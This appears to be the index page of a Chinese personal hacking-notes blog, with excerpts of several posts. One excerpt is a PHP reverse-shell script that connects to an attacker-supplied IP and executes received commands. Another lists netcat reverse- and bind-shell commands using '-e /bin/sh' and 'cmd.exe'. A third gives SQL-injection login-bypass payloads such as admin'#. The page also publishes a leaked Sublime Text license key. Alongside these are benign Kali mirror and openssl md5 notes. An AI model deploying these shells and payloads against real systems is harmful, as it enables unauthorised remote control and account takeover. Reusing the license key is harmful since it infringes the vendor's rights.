Myluzh Blog

PHP反弹shell

2020-3-6 myluzh PHP

需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口 <?php set_time_limit(0); $ip=$_GET['ip'] $port=$_GET['port']; if ($ip == "" and $port == "") { echo "[ip] [port] not defined"; exit(); } $fp = @fsockopen($ip, $port, $errno, $errstr); if (!$fp) { echo "connection timed out"; } else { fputs($fp, "\n++++++++++connect success++++++++\n"); while (!feof($fp)) { fputs($fp, "shell:"); //输出 $shell = fgets($fp); $message = `$shell`; fputs($fp, $message); } ...

阅读全文>>

标签: php 反弹 shell

评论(0) (1040)

Netcat基本用法总结

2020-3-6 myluzh NOTE

0x01基础使用 靶机创建一个服务端: nc -nvlp [端口] 攻击机开启监听: nc [服务端IP] [端口] 0x02获取shell 正向shell 靶机创建一个服务端: #Windows nc -nvlp [端口] -e cmd.exe #Linux nc -nvlp [端口] -e /bin/sh 攻击机开启监听: nc [服务端IP] [端口] 反向shell 靶机创建一个服务端: #Windows nc [攻击机IP] [端口] -e cmd.exe #Linux nc [攻击机IP] [端口] -e /bin/sh 攻击机开启监听: nc -nvlp [端口] 有些时候靶机上并没有nc,所以需要php反弹shell来实现,关于php反弹shell脚本 0x03文件传输 靶机创建一个服务端: nc -nvlp [端口] >1.txt 攻击机接受文件: nc [服务端IP] [端口] <1.txt 参考资料: Netcat下载地址:https://eternallybored.org/misc/netcat/ “瑞士军刀”N...

阅读全文>>

评论(0) (1052)

Kali Liunx更新源-国内Kali源

2020-3-6 myluzh NOTE

0x01编辑kali的更新源地址文件 sudo vim /etc/apt/sources.list 0x02添加下面的源地址(选择几个增加即可) #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清华大学 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-r...

阅读全文>>

标签: kali linux 更新源

评论(0) (873)

Kali Liunx下利用openssl进行md5加密

2020-3-5 myluzh NOTE

0x01 MD5加密 交互式输入 [root@kali ~]# openssl OpenSSL> md5 123456 (stdin)= f447b20a7fcbf53a5d5be013ea0b15af OpenSSL> md5 123456(stdin)= e10adc3949ba59abbe56e057f20f883e #MD5计算时包含了回车符 OpenSSL> [root@kali ~]# [root@kali ~]# openssl OpenSSL> md5 123456(stdin)= e10adc3949ba59abbe56e057f20f883e #输入完后按Crtl+D三次 管道标准输入处理 [root@kali ~]# echo 123456 |openssl md5 #MD5计算时包含了回车符 (stdin)= f447b20a7fcbf53a5d5be013ea0b15af [root@kali ~]# echo -n 123456 |openssl md5 #-n 不带回车符,才是正确的 (stdin)= e10adc3949ba59abbe56e0...

阅读全文>>

标签: kali linux openssl md5 加密

评论(0) (1221)

Sublime Text 3 安装 注册 汉化

2020-3-5 myluzh NOTE

0x01安装 进入官网 下载Sublime Text 3 并且安装,官网下载太慢的话可以复制下载链接用迅雷下载。 0x02注册 运行Sublime, 先点击状态栏的help,再点击进入enter lisence ,跳出来一个对话框,把下面的激活码复制进去即可注册。 ----- BEGIN LICENSE ----- Member J2TeaM Single User License EA7E-1011316 D7DA350E 1B8B0760 972F8B60 F3E64036 B9B4E234 F356F38F 0AD1E3B7 0E9C5FAD FA0A2ABE 25F65BD8 D51458E5 3923CE80 87428428 79079A01 AA69F319 A1AF29A4 A684C2DC 0B1583D4 19CBD290 217618CD 5653E0A0 BACE3948 BB2EE45E 422D2C87 DD9AF44B 99C49590 D2DBDEE1 75860FD2 8C8BB2AD B2ECE5A4 EFC08AF2 25A9B86...

阅读全文>>

评论(0) (1006)

简单分析登陆界面SQL注入 实现登录绕过

2020-3-4 myluzh NOTE

0x01适用条件 1.这个登陆系统用如下SQL语句来进行登陆校验 select * from user where username = '$username' and password='$passowrd' 这种sql语句,一般后面的判断就是如果数据库中存在用户名为$username, 密码为$passowrd的用户,就登陆成功,否则就登陆失败。 2.系统没有对用户输入进行全面的过滤 3. 系统后台使用的是MYSQL数据库 4. 系统中存在一个username为admin的用户 0x02注入方法 1.用户名输入:admin’or’1 ,密码随便输入,即可成功登陆。把我们输入用户名代入sql语句可以发现,or只需要满足username = 'admin'即可。 select * from user where username = 'admin' or' 1' and password='123456' 2.或者使用sql中的注释符#   用户名输入:admin’# ,密码随便输入,即可成功登陆。把我们输入用户名代入sql语句可以发现,sql语句#后面的内容都被注释掉了,也就是只需要满足usern...

阅读全文>>

标签: sql注入

评论(0) (1840)